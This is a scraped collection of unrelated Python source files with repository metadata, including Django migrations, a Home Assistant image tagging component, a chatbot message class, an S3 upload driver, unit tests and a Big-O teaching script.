self.findfiles(dir, base, self.recvar.get()) list.sort() self.close() pat = self.engine.getpat() print 'Searching %r in %s ...' % (pat, path) hits = 0 for fn in list: try: with open(fn) as f: for lineno, line in enumerate(f, 1): if line[-1:] == '\n': line = line[:-1] if prog.search(line): sys.stdout.write('%s: %s: %s\n' % (fn, lineno, line)) hits += 1 except IOError as msg: print msg print 'Hits found: %s\n(Hint: right-click to open locations.)' % hits if hits else 'No hits.' def findfiles(self, dir, base, rec): try: names = os.listdir(dir or os.curdir) except os.error as msg: print msg return [] list = [] subdirs = [] for name in names: fn = os.path.join(dir, name) if os.path.isdir(fn): subdirs.append(fn) elif fnmatch.fnmatch(name, base): list.append(fn) if rec: for subdir in subdirs: list.extend(self.findfiles(subdir, base, rec)) return list def close(self, event = None): if self.top: self.top.grab_release() self.top.withdraw() if __name__ == '__main__': import unittest unittest.main('idlelib.idle_test.test_grep', verbosity=2, exit=False) # okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\idlelib\grepdialog.pyc # decompiled 1 files: 1 okay, 0 failed, 0 verify failed # 2015.11.10 21:36:11 Střední Evropa (běžný čas)
8479fc36a34cd92829460ba09dac9233003f21e2
15f321878face2af9317363c5f6de1e5ddd9b749
/solutions_python/Problem_145/588.py
bc85913e20b14805e33519ef4c6568305d07637f
[]
no_license
dr-dos-ok/Code_Jam_Webscraper
c06fd59870842664cd79c41eb460a09553e1c80a
26a35bf114a3aa30fc4c677ef069d95f41665cc0
refs/heads/master
2020-04-06T08:17:40.938460
2018-10-14T10:12:47
2018-10-14T10:12:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,649
py
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function import math def read(f): n = int(f.readline().strip()) for i in xrange(n): p, q = map(int, f.readline().strip().split('/')) yield p, q def main(f): for i, (p, q) in enumerate(read(f)): if 2 ** int(math.log(q) / math.log(2)) != q: print("Case #{0}: impossible".format(i+1)) else: n = int(math.ceil((math.log(q) - math.log(p)) / math.log(2))) print("Case #{0}: {1}".format(i+1, n)) _input = """ 5 1/2 3/4 1/4 2/23 123/31488 """.strip() _output = """ Case #1: 1 Case #2: 1 Case #3: 2 Case #4: impossible Case #5: 8 """.strip() def test_main(compare=False): import sys from difflib import unified_diff from StringIO import StringIO if compare: stdout = sys.stdout sys.stdout = StringIO() try: main(StringIO(_input)) result = sys.stdout.getvalue().strip() finally: sys.stdout = stdout print(result) for line in unified_diff(result.splitlines(), _output.splitlines(), 'Output', 'Expect', lineterm=''): print(line) if result == _output: print("OK") else: print("NG") else: main(StringIO(_input)) if __name__ == '__main__': test = False compare = False if test: test_main(compare) else: import sys if len(sys.argv) > 1: f = open(sys.argv[1]) main(f) f.close() else: main(sys.stdin)
729aafbd622a90e8bebf023ef2424d3fcf61b70c
afea9757be324c8def68955a12be11d71ce6ad35
/willyanealves/services/migrations/0014_auto_20201209_1623.py
aa5563d97e9d3dbc154b4da10bedc96ae1265e5e
[]
no_license
bergpb/willyane-alves
c713cac3ec3a68005f3b8145985693d2477ba706
8b2b9922ba35bf2043f2345228f03d80dbd01098
refs/heads/master
2023-02-10T19:57:50.893172
2021-01-11T16:17:14
2021-01-11T16:17:14
null
0
0
null
null
null
null
UTF-8
Python
false
false
551
py
# Generated by Django 3.1.2 on 2020-12-09 19:23 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('stock', '0001_initial'), ('services', '0013_remove_kititem_price'), ] operations = [ migrations.AlterField( model_name='kititem', name='item', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stockitem', to='stock.stock'), ), ]
c91563eee6c60960746a34671256bdc380a91e08
af3ec207381de315f4cb6dddba727d16d42d6c57
/dialogue-engine/test/programytest/storage/stores/nosql/mongo/store/test_sets.py
b4a1ce00829727f91194650b0127c7d2bb059299
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
mcf-yuichi/cotoba-agent-oss
02a5554fe81ce21517f33229101013b6487f5404
ce60833915f484c4cbdc54b4b8222d64be4b6c0d
refs/heads/master
2023-01-12T20:07:34.364188
2020-11-11T00:55:16
2020-11-11T00:55:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,711
py
""" Copyright (c) 2020 COTOBA DESIGN, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import unittest from programytest.storage.asserts.store.assert_sets import SetStoreAsserts from programy.storage.stores.nosql.mongo.store.sets import MongoSetsStore from programy.storage.stores.nosql.mongo.engine import MongoStorageEngine from programy.storage.stores.nosql.mongo.config import MongoStorageConfiguration import programytest.storage.engines as Engines class MongoSetsStoreTests(SetStoreAsserts): @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_initialise(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assertEqual(store.storage_engine, engine) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_set_storage(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_set_storage(store) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_upload_from_text(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_from_text(store) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_upload_from_text_file(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_from_text_file(store) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_upload_text_files_from_directory_no_subdir(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_text_files_from_directory_no_subdir(store) @unittest.skip("CSV not supported yet") def test_upload_from_csv_file(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_from_csv_file(store) @unittest.skip("CSV not supported yet") def test_upload_csv_files_from_directory_with_subdir(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_csv_files_from_directory_with_subdir(store)
dcd0da39888cc54780f3269f3b421d663fbe0369
12d0f444452d3b2218cd270756283a0463d3e796
/sg/models/genome_evaluator.py
ebfcee9c68636525d62cd1370f29350bfbce32e0
[]
no_license
dal3006/load_forecasting-1
107ffdbb4648989ba85fa8ba39ecdddb9c24ddd1
d324a711a1a0c7ccd9587e0ecf9988a12214a1a3
refs/heads/master
2023-03-17T07:44:43.487863
2015-03-12T15:24:37
2015-03-12T15:24:37
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,873
py
"""Use this program to evaluate one genome at a time, read from standard input.""" import sys import ast import traceback import random import matplotlib.pyplot as plt import sg.utils.pyevolve_utils as pu import sg.utils import ga import sg.data.sintef.userloads as ul import load_prediction as lp from load_prediction_ar import * from load_prediction_ar24 import * from load_prediction_arima import * from load_prediction_dshw import * from load_prediction_esn import * from load_prediction_esn24 import * try: from load_prediction_CBR import * from load_prediction_wavelet import * from load_prediction_wavelet24 import * except ImportError: print >>sys.stderr, "Genome evaluator can't import CBR/wavelet modules, probably some of the dependencies are not installed." options = None def get_options(): global options parser = lp.prediction_options() parser = lp.ga_options(parser) parser = lp.data_options(parser) parser.add_option("--model", dest="model", help="The model class that the genomes instantiate", default=None) parser.add_option("--test-set", dest="test_set", action="store_true", help="Test the genomes on the test set, rather than on the training set", default=False) parser.add_option("--plot", dest="plot", action="store_true", help="Make a plot (in combination with --test-set)", default=False) (options, args) = parser.parse_args() lp.options = options if options.model is None: print >>sys.stderr, "Model argument is required." sys.exit(1) def read_next_genome_list(): print "Enter genome to be evaluated: " line = sys.stdin.readline() if line == "": print "End of input, exiting." sys.exit(0) return ast.literal_eval(line) def next_indiv(): gl = read_next_genome_list() genome = pu.AllelesGenome() genome.setInternalList(gl) genome.setParams(num_trials=options.num_trials) return genome def gene_test_loop(model): while sys.stdin: ga._model = model indiv = next_indiv() if options.test_set: print "Evaluating genome on test set: ", indiv[:] sys.stdout.flush() try: (target, predictions) = lp.parallel_test_genome(indiv, model) if options.parallel else lp.test_genome(indiv, model) except Exception, e: print >>sys.stderr, "Exception raised, failed to evaluate genome." tb = " " + traceback.format_exc(limit=50)[:-1] print >>sys.stderr, tb.replace("\n", "\n ") continue error = sg.utils.concat_and_calc_error(predictions, target, model.error_func) print "Error on test phase: {}".format(error) if options.plot: sg.utils.plot_target_predictions(target, predictions) plt.show() else: print "Evaluating genome on training set: ", indiv[:] sys.stdout.flush() fitness = ga._fitness(indiv) print "Fitness:", fitness if fitness != 0: print "Error:", ga._fitness_to_error(fitness) else: print "Error not calculated for 0 fitness." def run(): """.""" get_options() prev_handler = np.seterrcall(lp.float_err_handler) prev_err = np.seterr(all='call') np.seterr(under='ignore') random.seed(options.seed) np.random.seed(options.seed) model_creator = eval(options.model + "(options)") model = model_creator.get_model() lp._print_sim_context(model._dataset) print "Number of training sequences: %d" % options.num_trials print "Start days of training sequences:", model._dataset.train_periods_desc gene_test_loop(model) ul.tempfeeder_exp().close() if __name__ == "__main__": run()
7f370a2f39867e89d89ab28e23fdbd1bf78c5c33
affb8d9028f52201dc56dff947502134dcac3066
/class-06/demo/big_O.py
a4cb31e5067e800c86925b9dfb3be4fe661ec627
[]
no_license
maisjamil1/amman-python-401d1
10aa4d81c9082fbdf18badc3de060ce1d5309e1a
25c37a5a7c023b5a24ba7a6cc303338b62548f83
refs/heads/master
2022-12-28T19:23:11.143932
2020-10-13T11:58:30
2020-10-13T11:58:30
287,927,879
0
0
null
2020-08-16T11:11:27
2020-08-16T11:11:27
null
UTF-8
Python
false
false
2,410
py
# Measure # of operations n = 7 #1 operation for i in range(n): print(i) # n operations # n+1 operations # n = 5 > 6 # n = 100 > 101 # n = 1000000 > 1000001 # O(n+1) # O(n) def testing_bigoh(n): for i in range(n): for j in range(n): print(i,j) # n*n (n^2) # testing_bigoh(8) # O(n^2) nums1 = [2, 5, 8, 9, 43, 7] nums2 = [-4, 43, 7, 8, 13, 45] # One Loop # Return a list of all items bigger than number in unsorted list def find_nums_above(nums_list, number): result = [] # 1 operation for num in nums_list: # n times if num > number: result.append(num) # 1 operation -- 1 extra space elif num < number: print("Less") else: print("Else") print("Done with current iteration") # 1 operation return result # 1 operation print(find_nums_above(nums1, 10)) # O(2*n+1+1) => O(2n+2) # O(n) # O(n) spaces def find_nums_above_loop_inside(nums_list, number): result = [] # 1 operation for num in nums_list: # n times if num > number: result.append(num) # 1 operation elif num < number: print("Less") # 1 op for j in range(len(nums_list)): # n times print("Just for fun") # 1 op else: print("Else") # 1 op print("Done with current iteration") # 1 operation return result # 1 operation # O(1 + n (1+ (1 or 1+n or 1) ) + 1) # O(1 + n (1+ 1+n) + 1) # O(1 + n(2+n) +1) # O(2 + 2n^2) # O(2n^2) # O(n^2) print(find_nums_above_loop_inside(nums1, 10)) def tricky_example(a): print("Hi") # 1 op print (3*4*6/2) # 1 op a.sort() # Hidden loop (n*log(n)) -- Merge sort print(a) # 1 op print("The end") # 1 op # O(4 + sort-big-oh) # O(sort-big-oh) a = [4,7,2,9,5,0,3] # Binary Search # O(log n) # We divide the array into two halfes and we elimate one of them sorted_list = [-1, 4, 6, 9, 23, 30, 45, 65, 76, 77, 90] def binary_search(sorted_nums, target): min = 0 # 1 space max = len(sorted_nums)-1 # 1 space while max>min: pivot = (max+min)//2 # 1 space print(max, min, pivot) if target == sorted_nums[pivot]: return pivot elif target < sorted_nums[pivot]: max = pivot-1 else: min = pivot+1 return -1 print(binary_search(sorted_list, -1)) # O(3) spaces # O(1) # O(3*log n ) spaces # O(log n) def fib(i): # base cases return fib(i-1) + fib(i-2) # fib(4) = fib(3) + fib(2) # We recreate i variable in every recursive call
0ff0703817449a164cc4148e5e772d7aad82761d
20a0bd0a9675f52d4cbd100ee52f0f639fb552ef
/transit_odp/data_quality/migrations/0010_auto_20191118_1604.py
1dbd2499c70b6991917a996f3979d7d53de8b877
[]
no_license
yx20och/bods
2f7d70057ee9f21565df106ef28dc2c4687dfdc9
4e147829500a85dd1822e94a375f24e304f67a98
refs/heads/main
2023-08-02T21:23:06.066134
2021-10-06T16:49:43
2021-10-06T16:49:43
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,602
py
# Generated by Django 2.2.7 on 2019-11-18 16:04 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("data_quality", "0009_auto_20191118_1029"), ] operations = [ migrations.RemoveField( model_name="service", name="report", ), migrations.AddField( model_name="service", name="ito_id", field=models.TextField(default=None, unique=True), preserve_default=False, ), migrations.AddField( model_name="service", name="reports", field=models.ManyToManyField( related_name="services", to="data_quality.DataQualityReport" ), ), migrations.AddField( model_name="servicelink", name="ito_id", field=models.TextField(default=None, unique=True), preserve_default=False, ), migrations.AddField( model_name="servicepattern", name="ito_id", field=models.TextField(default=None, unique=True), preserve_default=False, ), migrations.AddField( model_name="timingpattern", name="ito_id", field=models.TextField(default=None, unique=True), preserve_default=False, ), migrations.AddField( model_name="vehiclejourney", name="ito_id", field=models.TextField(default=None, unique=True), preserve_default=False, ), ]
fce283892ba59dcf2ba42e224830b42612d88aa5
ec3e9925af8742d578fd11aac6f000ced71aa9f5
/crm_app/migrations/0001_initial.py
a8d2064e20aeff0443aad84487887d739acbfa32
[]
no_license
amrit-kumar/CRM-Customer-relationship-management-
cfd3ec42a975e7b987d76abe465cb2ec9eec62b4
d41b482166557e17825b2a010d24bb03ee469245
refs/heads/master
2021-06-25T06:37:51.721771
2017-08-12T09:43:23
2017-08-12T09:43:23
96,964,635
0
0
null
null
null
null
UTF-8
Python
false
false
1,216
py
# -*- coding: utf-8 -*- # Generated by Django 1.9.2 on 2017-01-17 10:59 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='MsgReports', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('request_id', models.CharField(blank=True, max_length=250, null=True)), ('user_id', models.CharField(blank=True, max_length=250, null=True)), ('date', models.DateTimeField(blank=True, null=True)), ('discription', models.CharField(blank=True, max_length=250, null=True)), ('number', models.BigIntegerField(blank=True, null=True)), ('sender_id', models.CharField(blank=True, max_length=250, null=True)), ('campaign_name', models.CharField(blank=True, max_length=250, null=True)), ('status', models.CharField(blank=True, choices=[('1', '1'), ('2', '2'), ('3', '3')], max_length=250, null=True)), ], ), ]
22cd4aa937ae8cfd23745a3259f156cd50b64a4e
cb3583cc1322d38b1ee05cb1c081e0867ddb2220
/donor/migrations/0014_auto_20210331_0404.py
b1189bdce3ff86f5f1436a2a55ec393aa74d80f9
[ "MIT" ]
permissive
iamgaddiel/codeupblood
9e897ff23dedf5299cb59fd6c44d9bd8a645e9c6
a0aa1725e5776d80e083b6d4e9e67476bb97e983
refs/heads/main
2023-05-07T23:34:27.475043
2021-04-24T20:49:08
2021-04-24T20:49:08
null
0
0
null
null
null
null
UTF-8
Python
false
false
405
py
# Generated by Django 3.1.6 on 2021-03-31 11:04 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('donor', '0013_auto_20210330_0743'), ] operations = [ migrations.AlterField( model_name='appointment', name='d_id', field=models.CharField(default='oiapGX', max_length=50), ), ]
d1a50b99473a4235042bb673ae4d5648722d7914
720dcd12b8fb7ab26125317a6f3d00c2623e5f13
/chatbotQuery/__init__.py
fe8fcde48e539b7f3222f7e172a5b2d88236c54b
[ "MIT" ]
permissive
tgquintela/chatbot_query
78e6f21268e06572009295c271c277ef89f2dcbc
4c5160992a444f828da019ae57a802467a13c2fa
refs/heads/master
2021-01-01T18:00:46.261089
2017-10-13T18:03:32
2017-10-13T18:03:32
98,224,976
0
1
null
null
null
null
UTF-8
Python
false
false
6,896
py
""" TODO ---- Decorator for message collections """ import copy class ChatbotMessage(dict): """ Compulsary elements ------------------- - message - collection - from [user, bot] """ def __init__(self, message): self.update({'message': '', 'collection': False}) self.update(message) assert('from' in self) assert('message' in self) assert('collection' in self) @classmethod def from_message(cls, message): if isinstance(message, ChatbotMessage): return message return cls(message) @classmethod def from_candidates_messages(cls, message): message.update({'from': 'bot'}) if type(message['message']) == str: message['collection'] = False elif type(message['message']) == list: message['collection'] = True return cls(message) @classmethod def fake_user_message(cls): return cls({'from': 'user'}) @property def last_message_text(self): if self['collection']: return self['message'][-1]['message'] else: return self['message'] def get_last_post(self): _, last_post = self._filter_message_2_post() for p in last_post: yield p def get_post(self): posts, _ = self._filter_message_2_post() for p in posts: yield p def get_all_messages(self): for p in self.get_post(): yield p for p in self.get_last_post(): yield p def format_message(self, format_information): if self['collection']: self['message'][-1]['message'] =\ self['message'][-1]['message'].format(**format_information) else: self['message'] = self['message'].format(**format_information) return self def reflect_message(self, pre_message): for key in pre_message: if key not in ['message', 'from', 'time', 'answer_status', 'sending_status', 'collection', 'posting_status']: self[key] = pre_message[key] return self def reflect_metadata(self, pre_message): for key in pre_message: if key not in self: if key not in ['message', 'from', 'time', 'answer_status', 'sending_status', 'collection']: self[key] = pre_message[key] return self def keep_query(self, pre_message): if 'query' in pre_message: if 'query' in self: if self['query'] is None: self['query'] = pre_message['query'] else: self['query'] = pre_message['query'] return self def _if_possible_send(self, message): logi = True logi = logi and (message['from'] == 'bot') logi = logi and (message['message'] != '') return logi def _filter_message_2_post(self): posts, last_post = [], [] if self['collection']: messages = [m for m in self['message'] if self._if_possible_send(m)] if len(messages): last_post = [messages[-1]] posts = messages[:-1] else: if self._if_possible_send(self): last_post = [copy.copy(self)] return posts, last_post def _detect_message_sending_status(self): if 'sending_status' in self: return self['sending_status'] return True def _preformat_collection_messages(self): if not self._detect_message_sending_status(): if not self['collection']: self['message'] = [copy.copy(self)] self['collection'] = True return self return self def _is_prepared(self, message): if message['message'] == '': return False if 'sending_status' in self: return self['sending_status'] if 'posting_status' in self: return self['posting_status'] def is_prepared(self): if self['collection']: return any([self._is_prepared(e) for e in self['message']]) else: return self._is_prepared(self) return False def add_tags(self, tags): if tags is not None and (type(tags) in [list, str]): tags = tags if type(tags) == list else [tags] if 'tags' in self: old_tags = self['tags'] old_tags += tags old_tags = list(set(old_tags)) self['tags'] = old_tags else: self['tags'] = tags if self['collection']: if 'tags' in self['message'][-1]: old_tags = self['message'][-1]['tags'] old_tags += tags old_tags = list(set(old_tags)) self['message'][-1]['tags'] = old_tags self['tags'] = old_tags else: self['message'][-1]['tags'] = tags return self def collapse_message(self, message): self._preformat_collection_messages() if self['collection']: messagestext = copy.copy(self['message']) if message['collection']: messagestext += message['message'] else: messagestext.append(message) self.update(message) self['message'] = messagestext self['collection'] = True self.check_message() return self else: output_message = copy.copy(message) output_message['collection'] = False if 'query' in message: output_message['query'] = message['query'] output_message =\ ChatbotMessage.from_candidates_messages(output_message) output_message.check_message() return output_message def add_selector_types(self, selector_types): ## Store results in message self['selector_types'] = selector_types return self def add_entry_to_last_message(self, entry_var, var): self[entry_var] = var if self['collection']: self['message'][-1][entry_var] = var return self def structure_answer(self): ## Input selector types if self['collection']: self['message'][-1]['selector_types'] = self['selector_types'] self.check_message() return self def check_message(self): if self['collection']: assert(all([isinstance(m, dict) for m in self['message']])) assert(all([isinstance(m['message'], str) for m in self['message']])) else: assert(isinstance(self['message'], str))
2d85e566ab46559127ff094934cff6b9e3b4a756
e72db255e41332c113f929eb63815b2169038209
/Chapter08/audio-encode-server-4/audio_encode_server/s3.py
8585e1faf5d52e430754cde9e22635bf0eee6396
[ "MIT" ]
permissive
PacktPublishing/Hands-On-Reactive-Programming-with-Python
b196b971fe49a36da9f979790b8c31c98a659031
757d45e2023032c6074e26ad252530f3c89978bf
refs/heads/master
2023-02-07T01:03:37.648175
2023-02-05T18:21:17
2023-02-05T18:21:38
128,761,473
75
19
null
null
null
null
UTF-8
Python
false
false
2,077
py
import asyncio from collections import namedtuple from io import BytesIO import reactivex as rx import boto3 from boto3.session import Session from cyclotron import Component Source = namedtuple('Source', ['response']) Sink = namedtuple('Sink', ['request']) # Sink objects Configure = namedtuple('Configure', [ 'access_key', 'secret_key', 'bucket', 'endpoint_url', 'region_name']) UploadObject = namedtuple('UploadObject', ['key', 'data', 'id']) # Source objects UploadReponse = namedtuple('UploadReponse', ['key', 'id']) def make_driver(loop=None): if loop is None: loop = asyncio.get_event_loop() def driver(sink): def on_subscribe(observer, scheduler): client = None bucket = None def on_next(item): nonlocal client nonlocal bucket if type(item) is Configure: session = Session(aws_access_key_id=item.access_key, aws_secret_access_key=item.secret_key) client = session.client( 's3', endpoint_url=item.endpoint_url, region_name=item.region_name) bucket = item.bucket elif type(item) is UploadObject: data = BytesIO(item.data) client.upload_fileobj(data, bucket, item.key) loop.call_soon_threadsafe(observer.on_next, UploadReponse( key=item.key, id=item.id)) else: loop.call_soon_threadsafe(observer.on_error, "unknown item: {}".format(type(item))) sink.request.subscribe( on_next=on_next, on_error=lambda e: loop.call_soon_threadsafe(observer.on_error, e), on_completed=lambda: loop.call_soon_threadsafe(observer.on_completed)) return Source( response=rx.create(on_subscribe) ) return Component(call=driver, input=Sink)
0f0a43f2a910cb3bd27dccab958083608f47a592
0258e0c9595406ceb3de32067aff776bc2a58fa8
/06_p12.py
a649f413d98bebdcef131856db0da2a3d6949b5d
[]
no_license
akromibn37/python_code
72c016c361b3ba2e04c83e1d1a703171b0bd8819
41d1a09f8ec8696e37ad83c1a0cb6506c7f0f4f6
refs/heads/master
2020-03-21T22:57:25.111642
2018-06-29T14:14:33
2018-06-29T14:14:33
139,157,588
0
0
null
null
null
null
UTF-8
Python
false
false
511
py
data = input().strip() l = [] for x in range(len(data)): l.append(data[x]) num = int(input().strip()) out = "" i = 0 while i<num: out = "" command = [e for e in input().split()] if command[0] == "in": l.insert(int(command[2]),command[1]) elif command[0] == "out": l.pop(int(command[1])) elif command[0] == "swap": x = l[int(command[1])] y = l[int(command[2])] l[int(command[1])] = y l[int(command[2])] = x for j in range(len(l)): out += l[j] print(out) i+=1
a3832070b1ec7002d6f2dd0a9f5bd280d29a3962
1fe8d4133981e53e88abf633046060b56fae883e
/venv/lib/python3.8/site-packages/tensorflow/python/keras/layers/cudnn_recurrent 2.py
96ae66c775e623fff4738688d4f11005c5261b33
[]
no_license
Akira331/flask-cifar10
6c49db8485038731ce67d23f0972b9574746c7a7
283e7a2867c77d4b6aba7aea9013bf241d35d76c
refs/heads/master
2023-06-14T16:35:06.384755
2021-07-05T14:09:15
2021-07-05T14:09:15
382,864,970
0
0
null
null
null
null
UTF-8
Python
false
false
130
py
version https://git-lfs.github.com/spec/v1 oid sha256:52c49577848819c4116b99c29c11e765e7a2d686e7ccb4dc7b84454bdf31510f size 20854
69ef378642a90c904e60bcd86fa6932e967ed311
032117bbf248a76abd25fcc2355bc8ade84fa76a
/inheritance_4.py
b62203cddf2bf1a42b3576a58752aaab34cfb71a
[]
no_license
shefaligoel136/python_summer_training
ba8f28f6af008584b4239c73d466e4e9d35b4b01
0b97fea050342fe4ed95b18c5f7ed885a6c8ca23
refs/heads/master
2022-11-13T07:22:32.855717
2020-07-06T08:33:19
2020-07-06T08:33:19
277,480,122
0
0
null
null
null
null
UTF-8
Python
false
false
388
py
# using super class a: def __init__(self): print("initof A") def feature1(self): print("feature 1 is working") def feature2(self): print("feature 2 is working") class b(a): def __init__(self): super().__init__() print("initof B") def feature3(self): print("feature 3 is working") def feature4(self): print("feature 4 is working") k = b() k.feature1()
79445dc9be69e70168bbf832fc269c16f8377373
c5859d1bdf44c8452563f856dc4191b74e85ce21
/custom_components/image_processing/tagbox.py
163ce385bf2c8182fd5f439a3f58b3d206199a0e
[]
no_license
balloob/homeassistant-config
46774ea88ced4414e48e4f1f40af63ff67b6f990
9f341e4b695db56f3c4af7299a336d5a0f60cdcf
refs/heads/master
2020-03-21T03:10:31.729526
2018-06-18T18:27:54
2018-06-18T18:27:54
138,039,924
11
0
null
2018-06-20T13:56:12
2018-06-20T13:56:12
null
UTF-8
Python
false
false
4,157
py
""" Component that will search images for tagged objects via a local machinebox instance. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/image_processing.tagbox """ import base64 import requests import logging import time import voluptuous as vol from homeassistant.core import split_entity_id import homeassistant.helpers.config_validation as cv from homeassistant.components.image_processing import ( PLATFORM_SCHEMA, ImageProcessingEntity, CONF_SOURCE, CONF_ENTITY_ID, CONF_NAME, DOMAIN) _LOGGER = logging.getLogger(__name__) CONF_ENDPOINT = 'endpoint' CONF_TAGS = 'tags' ROUNDING_DECIMALS = 2 PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_ENDPOINT): cv.string, vol.Optional(CONF_TAGS, default=[]): vol.All(cv.ensure_list, [cv.string]), }) def setup_platform(hass, config, add_devices, discovery_info=None): """Set up the classifier.""" entities = [] for camera in config[CONF_SOURCE]: entities.append(Tagbox( camera.get(CONF_NAME), config[CONF_ENDPOINT], camera[CONF_ENTITY_ID], config[CONF_TAGS], )) add_devices(entities) class Tagbox(ImageProcessingEntity): """Perform a tag search via a Tagbox.""" def __init__(self, name, endpoint, camera_entity, tags): """Init with the API key and model id""" super().__init__() if name: # Since name is optional. self._name = name else: self._name = "Tagbox {0}".format( split_entity_id(camera_entity)[1]) self._camera = camera_entity self._default_tags = {tag: 0.0 for tag in tags} self._tags = self._default_tags self._url = "http://{}/tagbox/check".format(endpoint) self._state = "no_processing_performed" self._response_time = None def process_image(self, image): """Process an image.""" timer_start = time.perf_counter() try: response = requests.post( self._url, json=self.encode_image(image) ).json() except: response = {'success': False} if response['success']: elapsed_time = time.perf_counter() - timer_start self._response_time = round(elapsed_time, ROUNDING_DECIMALS) self._tags, self._state = self.process_response(response) else: self._state = "Request_failed" self._tags = self._default_tags def encode_image(self, image): """base64 encode an image stream.""" base64_img = base64.b64encode(image).decode('ascii') return {"base64": base64_img} def process_response(self, response): """Process response data, returning the processed tags and state.""" tags = self._default_tags.copy() tags.update(self.process_tags(response['tags'])) if response['custom_tags']: tags.update(self.process_tags(response['custom_tags'])) # Default tags have probability 0.0 and cause an exception. try: state = max(tags.keys(), key=(lambda k: tags[k])) except: state = "No_tags_identified" return tags, state def process_tags(self, tags_data): """Process tags data, returning the tag and rounded confidence.""" processed_tags = { tag['tag'].lower(): round(tag['confidence'], ROUNDING_DECIMALS) for tag in tags_data } return processed_tags @property def camera_entity(self): """Return camera entity id from process pictures.""" return self._camera @property def device_state_attributes(self): """Return other details about the sensor state.""" attr = self._tags.copy() attr.update({'response_time': self._response_time}) return attr @property def state(self): """Return the state of the entity.""" return self._state @property def name(self): """Return the name of the sensor.""" return self._name
5c0d30018cbe2c3ef11519938d2dcc3bbcfa328b
267ab87884d6c74f8d676c1b6cfebf7e217e2ea7
/index/views.py
79a1320fcddf6b714ccc0465ccd2299e1bfd4d22
[]
no_license
Emehinola/charlotte
0d564181de1f5419a67c06e7dba5cd81796cb1aa
c3175757f5ce7d3ceab272dad9a866c4bea4bd1d
refs/heads/master
2023-04-23T00:38:18.965089
2021-04-30T19:34:17
2021-04-30T19:34:17
363,119,132
0
0
null
null
null
null
UTF-8
Python
false
false
816
py
from django.shortcuts import render from django.views import generic from blog.models import Article, categories # Create your views here. class Home(generic.ListView): model = Article paginate_by = 30 template_name = 'index/home.html' def get_context_data(self, **kwargs): context = { 'must_read': Article.objects.filter(must_read=True)[:5], 'articles': Article.objects.all(), 'categories': get_category } return context def get_category(): # return a list of blog categories raw = [] readable = [] for i in categories: raw.append(i[0]) # gets the first item of the list of tuples readable.append(i[1]) # gets the second item of the list of tuples output = zip(raw, readable) return output
de3fe45a87e82c646b0708bb94ef18a5f539f842
4d675034878c4b6510e1b45b856cc0a71af7f886
/mmdet/models/seg_heads/panoptic_fusion_heads/heuristic_fusion_head.py
06c1de2b9010fef13bd2322bbd3352d82a1f3e2f
[ "Apache-2.0", "BSD-2-Clause-Views", "MIT", "BSD-2-Clause" ]
permissive
shinya7y/UniverseNet
101ebc2ad8f15482ee45ea8d6561aa338a0fa49e
3652b18c7ce68122dae7a32670624727d50e0914
refs/heads/master
2023-07-22T08:25:42.646911
2023-07-08T18:09:34
2023-07-08T18:09:34
263,555,721
407
58
Apache-2.0
2023-01-27T01:13:31
2020-05-13T07:23:43
Python
UTF-8
Python
false
false
4,482
py
